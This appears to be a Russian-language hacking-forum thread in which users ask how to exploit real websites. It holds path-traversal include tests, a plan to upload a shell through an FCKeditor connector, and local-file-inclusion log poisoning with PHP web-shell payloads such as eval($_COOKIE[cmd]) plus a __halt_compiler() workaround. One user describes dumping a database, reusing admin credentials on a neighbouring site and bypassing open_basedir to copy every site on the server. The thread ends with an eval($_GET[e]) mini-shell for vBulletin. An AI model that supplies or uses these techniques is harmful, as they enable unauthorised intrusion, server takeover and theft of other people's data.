Ваши вопросы по уязвимостям.

Грузится

http://localhost/a/inc.php?inc=../index.php​

не грузится.

http://localhost/a/inc.php?inc=..\/index.php​

Перепробовал все варианты, все равно не грузится гад.

 

Простите за упорство, но решение вопроса должен был довести до конца.
Перепробовал на трех разных OS, версия PHP отличаются:

Debian & Ubuntu:
Работает

http://localhost/a/inc.php?inc=../index.php​

Не работает!

http://localhost/a/inc.php?inc=..\/index.php​

Windows XP:
Работает

http://localhost/a/inc.php?inc=../index.php​

Работает

http://localhost/a/inc.php?inc=..\index.php​

Работает!

http://localhost/a/inc.php?inc= ..\/index.php​

Работает!

http://localhost/a/inc.php?inc=../\index.php - через этот фильтр не пройдет, но таким способом тоже можно задать путь к файлу​

Вывод:
На Windows такая комбинация работает, потому что путь к файлу можно задавать как через \ так и через / (на Linux только /). Поэтому если в Windows задать \/ или /\ то это аналогично линуксовскому //.


Получается мой изначальный ответ был правильным - на Linux не работает. Если я где-то допустил ошибку сообщите.

 

Помогите раскрутить fckeditor version 2.6.6 Build 25427

Могу заливаьт картинки. больше ничего и файлы (точно знаю, что .txt)

2-а вопроса:

1. Как удалять файлы? (думаю, есть какой то параметр в ( Command=GetFoldersAndFiles )

PHP:

http://******.ru/fckeditor/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

Заливка возможна через:

PHP:

http://******.ru/fckeditor/editor/filemanager/connectors/uploadtest.html

PHP:

http://******.ru/fckeditor/editor/filemanager/connectors/test.html

2. Как туда ливануть шел. includ`а нет, либо не нашел.

 

там пофиксена бага с заливкой шелла..не зальешь

 

Хорошо. А как удалить папки и файлы? (.txt)

 

админ удалит когда спалит

 

LFI, проблема инклуда пхп кода в логи

Помогите понять некоторые проблемы, с которыми я столкнулся при раскрутке LFI уязвимости. Нашол логи:
http://www.domain.com/index.php?option=com_jresearch&controller=../../../../../../../../../../../../../homepages/26/d13583872/htdocs/logs/access.log.current%00
пробую проинклудить с помощью юзер агента код вида
<?php eval(stripslashes($_GET["cmd"])); ?> - херит логи и выдает ошибку что то типа связаную с кавычками, пробую вот так
<?php eval($_COOKIE[cmd]); ?>
в куки заганяю - cmd=phpinfo();
та же ерунда...
помогите разобраться с уязвимостью.

 

access.log испорчен, ищи другой способ.

 

а как инклудить чтоб неиспортить логи?
p.s. способ с /proc/self/environ%00 не катит, есть еще какие способы, а то уже готов бросить поиски?

 

http://forum.antichat.ru/thread232773.html

 

эту ветку всю перечитал, но вот так и не нашол ответа на вопрос, как инклудить в лог access чтоб его не испортить

 

Zahar, попробуй такое

PHP:

<?php 
eval($_COOKIE[cmd]); 
 __halt_compiler();
?>


__halt_compiler() остановит выполнение скрипта, компилятор так и не увидит синтаксических ошибок в коде (если их конечно не будет выше) и выполнит твой код выше.

 

Логи пишутся в конец файла, по этому сначала отработает испорченный код, а потом вывалиться ошибка.

 

да логи пишуться в конец файла, это 100%.
на испорченом логе произойдет та же ошибка, но дело в том что я столкнулся с таким не на одном сайте а на множестве, надо попробовать выше описаный код. отпишу сдесь обязательно.

 

Собственно вопрос, получил доступ к одному сайту (задача добратся к соседу), слил базу нашел логин и пароль админа удачно авторизировался на соседнем сайте, как залить shell на соседний сайт (для загрузки файлов там используется ckeditor), если везде установлен open_basedir, для доступа к файлам соседа использовал PHP 5.2.9 safe_mode & open_basedir bypass, но надоело по 1 файлу копировать, как можно заупаковать все сайты на сервере и скачать одним архивом? (пробывал различные шеллы в том числе и wso, не один не обошел open_basedir.

и почему там отображает директории(что за символы) open_basedir bypass?
Server OS : FreeBSD 8.2-RELEASE #0: Fri Feb 18 02:24:46 UTC 2011
Server software : Apache/2.0.63 (Unix) PHP/5.2.8 cURL MySQL/4.1.25
User info : uid=2525(apache) gid=2523(apache)
SafeMode : OFF
OpenBaseDir : /usr/local/psa/home/vhosts/domain.ru/httpdocs:/tmp
Disable functions : NONE

 

попробовал даным способом и столкнулся еще с одной проблемой, при вписывании в юзерагент кода пхп сервер попросту не отвечает, нашол еще еррор лог апача но увы

HTML:

Fatal error: Out of memory (allocated 56360960) (tried to allocate 47972352 bytes) in

Попробовал просто гетом отправить вот так

HTML:

http://www.domain.com/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../etc/passwd%00<?php phpinfo(); ?>

посмотрел access log но запрос попросту принял вид

HTML:

%3C?php%20phpinfo();%20?%3E

для эксплуатации непригоден.
Камрады есть еще варианты, потому как у меня попросту уже исчерпался запас.

 

подскажите с заливкой шелла в vbulletin
в фак копмлит добавил php переменную
пробывал разные методы
мэджик квотес врублены(мб в этом трабла)
подскажите плз

 

да
(5 симв)

 

минишелл добавил, попробывал загрузить файл, ошибок никаких не выдало, но при переходе на адрес шела-редиректит на главную страничку форума

eval($_GET[e]);